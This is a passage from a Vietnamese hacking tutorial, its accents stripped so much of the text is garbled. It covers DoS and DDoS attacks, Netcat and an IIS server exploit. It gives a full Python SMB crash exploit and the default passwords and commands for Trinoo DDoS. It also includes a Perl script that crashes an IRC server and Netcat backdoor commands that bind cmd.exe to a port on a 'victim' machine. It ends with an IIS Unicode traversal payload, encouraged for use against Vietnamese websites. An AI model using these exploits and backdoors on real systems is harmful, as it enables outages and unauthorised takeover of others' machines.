38.) DoS attack l g? ( Denial Of Services Attack ) DoS attack ( dch l tn cng t chi dch v ) l kiu tn cng rt li hi , vi loi tn cng ny , bn ch cn mt my tnh kt ni Internet l c th thc hin vic tn cng c my tnh ca I phng . thc cht ca DoS attack l hacker s chim dng mt lng ln ti nguyn trn server ( ti nguyn c th l bng thng, b nh, cpu, a cng, ... ) lm cho server khng th no p ng cc yu cu t cc my ca ngui khc ( my ca nhng ngi dng bnh thng ) v server c th nhanh chng b ngng hot ng, crash hoc reboot .
39.) Cc loi DoS attack hin ang c bit n v s dng : a . ) Winnuke : _DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x . Hacker s gi cc gi tin vi d liu `Òut of Band`` n cng 139 ca my tnh ch.( Cng 139 chnh l cng NetBIOS, cng ny ch chp nhn cc gi tin c c Out of Band c bt ) . Khi my tnh ca victim nhn c gi tin ny, mt mn hnh xanh bo li s
c hin th ln vi nn nhn do chng trnh ca Windows nhn c cc gi tin ny nhng n li khng bit phn ng vi cc d liu Out Of Band nh th no dn n h thng s b crash . b . ) Ping of Death : _ kiu DoS attack ny , ta ch cn gi mt gi d liu c kch thc ln thng qua lnh ping n my ch th h thng ca h s b treo . _ VD : ping l 65000 c . ) Teardrop : _ Nh ta bit , tt c cc d liu chuyn i trn mng t h thng ngun n h thng ch u phi tri qua 2 qu trnh : d liu s c chia ra thnh cc mnh nh h thng ngun, mi mnh u phi c mt gi tr offset nht nh xc nh v tr ca mnh trong gi d liu c chuyn i. Khi cc mnh ny n h thng ch, h thng ch s da vo gi tr offset sp xp cc mnh li vi nhau theo th t ng nh ban u . Li dng s h , ta ch cn gi n h thng ch mt lot gi packets vi gi tr offset chng cho ln nhau. H thng ch s khng th no sp xp li cc packets ny, n khng iu khin c v c th b crash, reboot hoc ngng hot ng nu s lng gi packets vi gi tr offset chng cho ln nhau qu ln ! d . ) SYN Attack : _ Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch ip ngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi tr li cc a ch khng c thc v ch I nhn thng tin phn hi t cc a ch ip gi . V y l cc a ch ip khng c thc, nn h thng ch s s ch i v ch v cn a cc ``request`` ch i ny vo b nh , gy lng ph mt lng ng k b nh trn my ch m ng ra l phi dng vo vic khc thay cho phi ch i thng tin phn hi khng c thc ny . Nu ta gi cng mt lc nhiu gi tin c a ch IP gi nh vy th h thng s b qu ti dn n b crash hoc boot my tnh . == > nm du tay . e . ) Land Attack : _ Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc a ch ip khng c thc, hacker s dng chnh a ch ip ca h thng nn nhn. iu ny s to nn mt vng lp v tn gia trong chnh h thng nn nhn , gia mt bn cn nhn thng tin phn hi cn mt bn th chng bao gi gi thng tin phn hi i c . == > Gy ng p lng ng . f . ) Smurf Attack : _Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mng khuch i (s nghe lnh ca hacker) v h thng ca nn nhn. Hacker s gi cc gi tin ICMP n a ch broadcast ca mng khuch i. iu c bit l cc gi tin ICMP
packets ny c a ch ip ngun chnh l a ch ip ca nn nhn . Khi cc packets n c a ch broadcast ca mng khuch i, cc my tnh trong mng khuch i s tng rng my tnh nn nhn gi gi tin ICMP packets n v chng s ng lot gi tr li h thng nn nhn cc gi tin phn hi ICMP packets. H thng my nn nhn s khng chu ni mt khi lng khng l cc gi tin ny v nhanh chng b ngng hot ng, crash hoc reboot. Nh vy, ch cn gi mt lng nh cc gi tin ICMP packets i th h thng mng khuch i s khuch i lng gi tin ICMP packets ny ln gp bI . T l khuch i ph thuc vo s mng tnh c trong mng khuch I . Nhim v ca cc hacker l c chim c cng nhiu h thng mng hoc routers cho php chuyn trc tip cc gi tin n a ch broadcast khng qua ch lc a ch ngun cc u ra ca gi tin . C c cc h thng ny, hacker s d dng tin hnh Smurf Attack trn cc h thng cn tn cng . == > mt my lm chng si nh , chc my chm li ta nh cho thua . g . ) UDP Flooding : _ Cch tn cng UDP i hi phi c 2 h thng my cng tham gia. Hackers s lm cho h thng ca mnh i vo mt vng lp trao i cc d liu qua giao thc UDP. V gi mo a ch ip ca cc gi tin l a ch loopback ( 127.0.0.1 ) , ri gi gi tin ny n h thng ca nn nhn trn cng UDP echo ( 7 ). H thng ca nn nhn s tr li li cc messages do 127.0.0.1( chnh n ) gi n , kt qu l n s i vng mt vng lp v tn. Tuy nhin, c nhiu h thng khng cho dng a ch loopback nn hacker s gi mo mt a ch ip ca mt my tnh no trn mng nn nhn v tin hnh ngp lt UDP trn h thng ca nn nhn . Nu bn lm cch ny khng thnh cng th chnh my ca bn s b y . h . ) Tn cng DNS : _ Hacker c th i mt li vo trn Domain Name Server ca h thng nn nhn ri cho ch n mt website no ca hacker. Khi my khch yu cu DNS phn tch a ch b xm nhp thnh a ch ip, lp tc DNS ( b hacker thay i cache tm thI ) s i thnh a ch ip m hacker cho ch n . Kt qu l thay v phi vo trang Web mun vo th cc nn nhn s vo trang Web do chnh hacker to ra . Mt cch tn cng t chi dch v tht hu hiu !. g . ) Distributed DoS Attacks ( DDos ) : _ DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers s c thm nhp vo cc mng my tnh c bo mt km, sau ci ln cc h thng ny chng trnh DDoS server. By gi cc hackers s hn nhau n thi gian nh s dng DDoS client kt ni n cc DDoS servers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tn cng DDoS n h thng nn nhn . h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) : _ y c l l kiu tn cng li hi nht v lm boot my tnh ca i phng nhanh gn
nht . Cch lm th cng tng t nh DDos nhng thay v tn cng bng nhiu my tnh th ngI tn cng ch cn dng mt my tn cng thng qua cc server ln trn th gii . Vn vi phng php gi mo a ch IP ca victim , k tn cng s gi cc gi tin n cc server mnh nht , nhanh nht v c ng truyn rng nht nh Yahoo .v.v , cc server ny s phn hi cc gi tin n a ch ca victim . Vic cng mt lc nhn c nhiu gi tin thng qua cc server ln ny s nhanh chng lm nghn ng truyn ca my tnh nn nhn v lm crash , reboot my tnh . Cch tn cng ny li hi ch ch cn mt my c kt ni Internet n gin vi ng truyn bnh thng cng c th nh bt c h thng c ng truyn tt nht th giI nu nh ta khng kp ngn chn . Trang Web HVA ca chng ta cng b DoS va ri bi cch tn cng ny y . 40 . ) K thut DoS Web bng Python : _ K thut ny ch c th s dng duy nht trn WinNT , v bn cn phi c thi gian th my tnh ca nn nhn mi b down c . _ Bn hy download Pyphon ti http://www.python.org/ s dng . _ Bn hy save on m sau ln file rfpoison.py . CODE import string import struct from socket import * import sys def a2b(s): bytes = map(lambda x: string.atoi(x, 16), string.split(s)) data = string.join(map(chr, bytes), ``) return data def b2a(s): bytes = map(lambda x: `%.2x` % x, map(ord, s)) return string.join(bytes, ` `) # Yu cu tp hp NBSS nbss_session = a2b(`````` 81 00 00 48 20 43 4b 46 44 45 4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43 41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45 42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46 43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00 00 00 ``````) # To SMB crud = ( # Yu cu SMBnegprot ``````
ff 53 4d 42 72 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43 20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 ``````, # Yu cu setup SMB X `````` ff 53 4d 42 73 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f 55 50 00 55 6e 69 78 00 53 61 6d 62 61 00 ``````, # Yu cu SMBtconX `````` ff 53 4d 42 75 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00 00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56 45 52 5c 49 50 43 24 00 49 50 43 00 ``````, # Yu cu khI to SMBnt X `````` ff 53 4d 42 a2 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00 07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72 76 73 76 63 00 ``````, # yu cu bin dch SMB `````` ff 53 4d 42 25 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49
50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00 00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00 00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 ``````, # SMBtrans Request `````` ff 53 4d 42 25 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49 50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00 00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00 00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00 5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00 56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 `````` ) crud = map(a2b, crud) def smb_send(sock, data, type=0, flags=0): d = struct.pack(`!BBH`, type, flags, len(data)) #print `send:`, b2a(d+data) sock.send(d+data) def smb_recv(sock): s = sock.recv(4) assert(len(s) == 4) type, flags, length = struct.unpack(`!BBH`, s) data = sock.recv(length) assert(len(data) == length) #print `recv:`, b2a(s+data) return type, flags, data def nbss_send(sock, data): sock.send(data) def nbss_recv(sock): s = sock.recv(4) assert(len(s) == 4) return s def main(host, port=139): s = socket(AF_INET, SOCK_STREAM) s.connect(host, port) nbss_send(s, nbss_session) nbss_recv(s) for msg in crud[:-1]:
smb_send(s, msg) smb_recv(s) smb_send(s, crud[-1]) # no response to this s.close() if __name__ == `__main__`: print `Sending poison...`, main(sys.argv[1]) print `done.`
c th lm down c server ca i phng bn cn phi c thi gian DoS , nu khng c iu kin ch i tt nht bn khng nn s dng cch ny . Nhng vc th cho bit th c ng khng ? 41 . ) Tn cng DDoS thng qua Trinoo : _ Bn bit DDoS attack l g ri phi khng ? Mt cuc tn cng DDoS bng Trinoo c thc hin bi mt kt ni ca Hacker Trinoo Master v ch dn cho Master pht ng mt cuc tn cng DDoS n mt hay nhiu mc tiu. Trinoo Master s lin lc vi nhng Deadmons a nhng a ch c dn n tn cng mt hay nhiu mc tiu trong khong thi gian xc nh . _ C Master v Deamon u c bo v bng Passwd . ch khi chng ta bit passwd th mi c th iu khin c chng , iu ny khng c g kh khn nu chng ta l ch nhn thc s ca chng . Nhng passwd ny thng c m ho v bn c th thit lp khi bin dch Trinoo t Source ----- > Binnary. Khi c chy , Deadmons s hin ra mt du nhc v ch passwd nhp vo , nu passwd nhp sai n s t ng thot cn nu passwd c nhp ng th n s t ng chy trn nn ca h thng . attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is `^]`. kwijibo Connection closed by foreign host. < == Bn nhp sai
attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is `^]`. betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo > < == bn vo c h thng trinoo _ y l vi passwd mc nh :
l44adsl``: pass ca trinoo daemon . ``gorave``: passwd ca trinoo master server khi startup . ``betaalmostdone``: passwd iu khin t xa chung cho trinoo master . ``killme``: passwd trinoo master iu khin lnh ``mdie`` . _ y l mt s lnh dng iu khin Master Server:
CODE die------------------------------------------------ ------------Shutdown. quit----------------------------------------------- -------------Log off. mtimer N-------------------------------------------------- --t thI gian tn cng DoS , vI N nhn gi tr t 1-- > 1999 giy . dos IP------------------------------------------------- ------Tn cng n mt a ch IP xc nh . mdie pass----------------------------------------------- ----V hiu ho tt c cc Broadcast , nu nh passwd chnh xc . Mt lnh c gi ti (``d1e l44adsl``) Broadcast Shutdown chng . Mt passwd ring bit s c t cho mc ny mping---------------------------------------------- ----------Gi mt lnh ping ti (``png l44adsl``) cc Broadcast. mdos ------------------------------------------Send nhiu lnh DOS (``xyz l44adsl 123:ip1:ip2``) n cc Broadcast. info----------------------------------------------- --------------Hin th thng tin v Trinoo . msize---------------------------------------------- ------------t kch thc m cho nhng gi tin c send i trong sut thI gian DoS. nslookup host----------------------------------------------X c nh tn thit b ca Host m Master Trinoo ang chy . usebackup------------------------------------------ ---------Chuyn tI cc file Broadcast sao lu c to bi lnh killdead. bcast---------------------------------------------- -------------Lit k danh sch tt c cc Broadcast c th khai thc . help [cmd] --------------------------------------------------- a ra danh sch cc lnh . mstop---------------------------------------------- -------------Ngng li cc cuc tn cng DOS .
_ y l mt s lnh dng iu khin Trinoo Deadmons: CODE aaa pass IP------------------------------------------------- ---Tn cng n a ch IP xc nh . GI gi tin UDP (0-65534) n cng ca UDP ca a ch IP xc nh trong mt khong thi gian xc nh c mc nh l 120s hay t 1-- > 1999 s . bbb pass N-------------------------------------------------- ---t thI gian gii hn cho cc cuc tn cng DOS . Shi pass----------------------------------------------- ---------Gi chui *HELLO* ti dnh sch Master Server c bin dch trong chng trnh trn cng 31335/UDP.
png pass----------------------------------------------- --------Send chui Pong tI Master Server pht hnh cc lnh iu khin trn cng 31335/UDP. die pass----------------------------------------------- ---------Shutdown Trinoo. rsz N-------------------------------------------------- ----------L kch thc ca b m c dng tn cng , n c tnh bng byte . xyz pass 123:ip1:ip3---------------------------------------- tn cng DOS nhiu mc tiu cng lc .
( Da theo hng dn ca huynh Binhnx2000 ) Cn nhiu on m v cch ng dng DoS lm , cc bn chu kh tm hiu thm nh . Nhng ng tn cng lung tung , nht l server ca HVA , coi chng khng thu c hiu qu m cn b lock nick na Ht phn 6 - Anhdenday
42 . ) K thut n cng DoS vo WircSrv Irc Server v5.07 : WircSrv IRC l mt Server IRC thng dng trn Internet ,n s b Crash nu nh b cc Hacker gi mt Packet ln hn gi tr ( 65000 k t ) cho php n Port 6667. Bn c th thc hin vic ny bng cch Telnet n WircSrv trn Port 6667:
Nu bn dng Unix: [hellme@die-communitech.net$ telnet irc.example.com 6667 Trying example.com... Connected to example.com. Escape character is `^]`. [buffer] Windows cng tng t: telnet irc.example.com 6667 Lu : [buffer] l Packet d liu tng ng vi 65000 k t . Tuy nhin , chng ta s crash n rt n gin bng on m sau ( Cc bn hy nhn vo on m v t mnh gii m nhng cu lnh trong , cng l mt trong nhng cch tp luyn cho s phn x ca cc hacker khi h nghin cu . No , chng ta hy phn tch n mt cch cn bn ):
CODE #!/usr/bin/perl #< == on m ny cho ta bit l dng cho cc lnh trong perl use Getopt::Std; use Socket; getopts(`s:`, \%args); if(!defined($args{s})){&usage;} my($serv,$port,$foo,$number,$data,$buf,$in_addr,$pa ddr,$proto); $foo = `À``; # y l NOP $number = ``65000``; # y l tt c s NOP $data .= $foo x $number; # kt qu ca $foo times $number $serv = $args{s}; # lnh iu khin server t xa $port = 6667; # lnh iu khin cng t xa , n c mc nh l 6667 $buf = ``$data``; $in_addr = (gethostbyname($serv))[4]
47.) Cc cng c cn thit hack Web : i vi cc hacker chuyn nghip th h s khng cn s dng nhng cng c ny m h s trc tip setup phin bn m trang Web nn nhn s dng trn my ca mnh test li . Nhng i vi cc bn mi vo ngh th nhng cng c ny rt cn thit , hy s dng chng mt vi ln bn s bit cch phi hp chng vic tm ra li trn cc trang Web nn nhn c nhanh chng nht . Sau y l mt s cng c bn cn phi c trn my lm n ca mnh : Cng c th 1 : Mt ci proxy dng che du IP v vt tng la khi cn ( Cch to 1 ci Proxy ti by phn 7 , cc bn hy xem li nh ) . Cng c th 2 : Bn cn c 1 shell account, ci ny thc s quan trng i vi bn . Mt shell account tt l 1 shell account cho php bn chy cc chng trnh chnh nh nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...v shell account cn phi ci chng trnh GCC ( rt quan trng trong vic dch (compile) cc exploit c vit bng C) nh MinGW, Cygwin v cc dev tools khc. Shell account gn ging vi DOS shell,nhng n c nhiu cu lnh v chc nng hn DOS . Thng thng khi bn ci Unix th bn s c 1 shell account, nu bn khng ci Unix th bn nn ng k trn mng 1 shell account free hoc nu c ai ci Unix v thit lp cho bn 1 shell account th bn c th log vo telnet (Start -- > Run -- > g Telnet) dng shell account . Sau y l 1 s a ch bn c th ng k free shell account : http://www.freedomshell.com/ http://www.cyberspace.org/shell.html
http://www.ultrashell.net/ _Cng c th 3 : NMAP l Cng c qut cc nhanh v mnh. C th qut trn mng din rng v c bit tt i vi mng n l. NMAP gip bn xem nhng dch v no ang chy trn server (services / ports : webserver , ftpserver , pop3,...),server ang dng h iu hnh g,loi tng la m server s dng,...v rt nhiu tnh nng khc.Ni chung NMAP h tr hu ht cc k thut qut nh : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP c nh gi l cng c hng u ca cc Hacker cng nh cc nh qun tr mng trn th gii. Mi thng tin v NMAP bn tham kho ti http://www.insecure.org/ . _ Cng c th 4 : Stealth HTTP Security Scanner l cng c qut li bo mt tuyt vi trn Win32. N c th qut c hn 13000 li bo mt v nhn din c 5000 exploits khc. _ Cng c th 5 : IntelliTamper l cng c hin th cu trc ca mt Website gm nhng th mc v file no, n c th lit k c c th mc v file c set password. Rt tin cho vic Hack Website v trc khi bn Hack mt Website th bn phi nm mt s thng tin ca Admin v Website . _ Cng c th 6 : Netcat l cng c c v ghi d liu qua mng thng qua giao thc TCP hoc UDP. Bn c th dng Netcat 1 cch trc tip hoc s dng chng trnh script khc iu khin Netcat. Netcat c coi nh 1 exploitation tool do n c th to c lin kt gia bn v server cho vic c v ghi d liu ( tt nhin l khi Netcat c ci trn 1 server b lI ). Mi thng tin v Netcat bn c th tham kho ti http://www.l0pht.com/ . _ Cng c th 7 : Active Perl l cng c c cc file Perl ui *.pl v cc exploit thng c vit bng Perl . N cn c s dng thi hnh cc lnh thng qua cc file *.pl . _ Cng c th 8 : Linux l h iu hnh hu ht cc hacker u s dng. _ Cng c th 9 : L0phtCrack l cng c s mt Crack Password ca Windows NT/2000 . _ Cch Download ti by ri nn khng ni y , cc bn khi Download nh ch n cc phin bn ca chng , phin bn no c s ln nht th cc bn hy Down v m si v n s c thm mt s tnh nng m cc phin bn trc cha c . Nu down v m cc bn khng bit s dng th tm li cc bi vit c c hng dn bn Box ngh . Nu vn khng thy th c post bi hi , cc bn bn s tr li cho bn .
48 . ) Hng dn s dng Netcat :
a . ) Gii thiu : Netcat l mt cng c khng th thiu c nu bn mun hack mt website no v n rt mnh v tin dng . Do bn cn bit mt cht v Netcat . b . ) Bin dch : _ i vi bn Netcat cho Linux, bn phi bin dch n trc khi s dng. - hiu chnh file netcat.c bng vi: vi netcat.c + tm dng res_init(); trong main() v thm vo trc 2 du ``/``: // res_init(); + thm 2 dng sau vo phn #define (nm u file):
#define GAPING_SECURITY_HOLE #define TELNET
- bin dch: make linux - chy th: ./nc -h - nu bn mun chy Netcat bng nc thay cho ./nc, bn ch cn hiu chnh li bin mi trng PATH trong file ~/.bashrc, thm vo ``:.`` PATH=/sbin:/usr/sbin:...:. _ Bn Netcat cho Win khng cn phi compile v c sn file nh phn nc.exe. Ch vy gii nn v chy l xong. c . ) Cc ty chn ca Netcat : _ Netcat chy ch dng lnh. Bn chy nc -h bit cc tham s:
CODE C: > nc -h connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port] options: -d ----------- tch Netcat khi ca s lnh hay l console, Netcat s chy ch steath(khng hin th trn thanh Taskbar) -e prog --- thi hnh chng trnh prog, thng dng trong ch lng nghe -h ----------- gi hng dn -i secs ----- tr hon secs mili giy trc khi gi mt dng d liu i -l ------------- t Netcat vo ch lng nghe ch cc kt ni n -L ------------ buc Netcat ``c`` lng nghe. N s lng nghe tr li sau mi khi ngt mt kt ni. -n ------------ ch dng a ch IP dng s, chng hn nh 192.168.16.7, Netcat s khng thm vn DNS -o ------------ file ghi nht k vo file -p port ----- ch nh cng port -r yu cu Netcat chn cng ngu nhin(random) -s addr ----- gi mo a ch IP ngun l addr -t ------------- khng gi cc thng tin ph i trong mt phin telnet. Khi bn telnet n mt telnet daemon(telnetd), telnetd thng yu cu trnh telnet client ca bn gi n cc thng tin ph nh bin mi trng TERM, USER. Nu bn s dng netcat vi ty chn -t telnet, netcat s khng gi cc thng tin ny n telnetd. -u ------------- dng UDP(mc nh netcat dng TCP) -v ------------- hin th chi tit cc thng tin v kt ni hin ti. -vv ----------- s hin th thng tin chi tit hn na. -w secs ---- t thi gian timeout cho mi kt ni l secs mili giy -z ------------- ch zero I/O, thng c s dng khi scan port
Netcat h tr phm vi cho s hiu cng. C php l cng1-cng2. V d: 1-8080 ngha l 1,2,3,..,8080
d . ) Tm hiu Netcat qua cc VD :
_ Chp banner ca web server :
V d: nc n 172.16.84.2, cng 80
CODE C: > nc 172.16.84.2 80 HEAD / HTTP/1.0 (ti y bn g Enter 2 ln) HTTP/1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content-Type: text/html
bit thng tin chi tit v kt ni, bn c th dng v ( -vv s cho bit cc thng tin chi tit hn na)
C: > nc -vv 172.16.84.1 80
CODE 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [172.16.84.1] 80 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache/1.3.20 (Win32) Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: ``0-cec-3899eaea`` Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text/html sent 17, rcvd 245: NOTSOCK
Nu mun ghi nht k, hy dng -o . V d:
nc -vv -o nhat_ki.log 172.16.84.2 80
xem file nhat_ki.log xem th n ghi nhng g nh :
CODE < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK. < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54 < 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap < 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win < 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: ``0-cec< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accep < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes. < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length: < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm < 000000f0 6c 0d 0a 0d 0a # l....
du < ngha l server gi n netcat du > ngha l netcat gi n server
_ Qut cng : Bn hy chy netcat vi ty chn z . Nhng qut cng nhanh hn, bn hy dng -n v netcat s khng cn thm vn DNS. V d scan cc cng TCP(1- > 500) ca host 172.16.106.1
CODE [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 443 (?) open (UNKNOWN) [172.16.106.1] 139 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open (UNKNOWN) [172.16.106.1] 80 (?) open (UNKNOWN) [172.16.106.1] 23 (?) open
nu bn cn scan cc cng UDP, dng -u
CODE [dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 1025 (?) open (UNKNOWN) [172.16.106.1] 1024 (?) open (UNKNOWN) [172.16.106.1] 138 (?) open (UNKNOWN) [172.16.106.1] 137 (?) open (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open
_ Bin Netcat thnh mt trojan : Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe, dng ty chn l ( listen ) v -p port xc nh s hiu cng cn lng nghe, -e yu cu netcat thi hnh 1 chng trnh khi c 1 kt ni n, thng l shell lnh cmd.exe ( i vi NT) hoc /bin/sh(i vi Unix). V d:
CODE E: > nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error
Trn my tnh dng tn cng, bn ch vic dng netcat ni n my nn nhn trn cng nh, chng hn nh 8080
CODE C: > nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. E: > cd test cd test
E: est > dir /w dir /w Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E: est [.] [..] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 262,499 bytes 2 Dir(s) 191,488,000 bytes free C: est > exit exit sent 20, rcvd 450: NOTSOCK
Nh cc bn thy , ta c th lm nhng g trn my ca nn nhn ri , ch cn mt s lnh c bn , ta chim c my tnh ca i phng , cc bn hy xem tip nh :
CODE E: > nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 ...? ?
Ring i vi Netcat cho Win, bn c th lng nghe ngay trn cng ang lng nghe. Ch cn ch nh a ch ngun l -s<a_ch_ip_ca_my_ny > . V d:
CODE netstat -a ... TCP nan_nhan:domain nan_nhan:0 LISTENING <- cng 53 ang lng nghe ... E: > nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - > lng nghe ngay trn cng 53 listening on [172.16.84.1] 53 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163? ?
Trn Windows NT, t Netcat ch lng nghe, khng cn phi c quyn Administrator, ch cn login vo vi 1 username bnh thng khi ng Netcat l xong. Ch : bn khng th chy netcat vi ... -u -e cmd.exe... hoc ...-u -e /bin/sh... v netcat s khng lm vic ng. Nu bn mun c mt UDP shell trn Unix, hy dng udpshell thay cho netcat.
( Da theo bi vit ca huynh Vicky )
49 . ) K thut hack IIS server 5.0 :
_ IIS server vi cc phin bn t trc n phin bn 5.0 u c li ta c th khai thc , do by gi hu ht mi ngi u dng IIS server 5.0 nn li cc phin bn trc ti
khng cp n . By gi ti s by cc bn cch hack thng qua cng c activeperl v IE , cc bn c th vn dng cho cc trang Web VN v chng b li ny rt nhiu . Ta hy bt u nh . _ Trc ht cc bn hy download activeperl v Unicode.pl . _ S dng telnet xc nh trang Web ta tn cng c s dng IIS server 5.0 hay khng :
CODE telnet < tn trang Web > 80 GET HEAD / HTTP/1.0
Nu n khng bo cho ta bit mc tiu ang s dng chng trnh g th cc bn hy thay i cng 80 bng cc cng khc nh 8080, 81, 8000, 8001 .v.v _ Sau khi xc nh c mc tiu cc bn vo DOS g :
CODE perl unicode.pl Host: ( g a ch server m cc bn mun hack ) Port: 80 ( hoc 8080, 81, 8000, 8001 tu theo cng m ta telnet trc ) .
_ Cc bn s thy bng lit k li ( c lp trnh trong Unicode.pl ) nh sau :
CODE [1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
